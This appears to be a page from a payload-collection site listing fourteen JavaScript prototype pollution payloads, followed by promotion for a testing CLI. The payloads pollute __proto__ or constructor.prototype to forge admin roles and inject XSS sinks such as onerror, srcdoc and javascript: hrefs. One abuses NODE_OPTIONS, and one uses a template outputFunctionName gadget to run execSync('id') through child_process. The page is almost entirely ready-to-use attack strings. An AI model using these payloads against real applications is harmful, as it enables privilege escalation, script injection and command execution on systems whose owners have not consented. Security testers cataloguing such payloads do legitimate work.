$loading...
JavaScript prototype pollution payloads for __proto__, constructor, and deep merge exploitation. (14 payloads)
{"__proto__": {"isAdmin": true}}{"constructor": {"prototype": {"isAdmin": true}}}?__proto__[isAdmin]=true?__proto__.isAdmin=true{"__proto__": {"toString": "polluted"}}{"__proto__": {"innerHTML": "<img src=x onerror=alert(1)>"}}{"__proto__": {"srcdoc": "<script>alert(1)</script>"}}{"__proto__": {"href": "javascript:alert(1)"}}{"__proto__": {"onload": "alert(1)"}}{"__proto__": {"value": "<script>alert(1)</script>"}}{"__proto__": {"shell": "/proc/self/exe", "NODE_OPTIONS": "--require /proc/self/cmdline"}}{"__proto__": {"status": 500}}{"__proto__": {"admin": true, "role": "superadmin"}}{"__proto__": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');x"}}Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides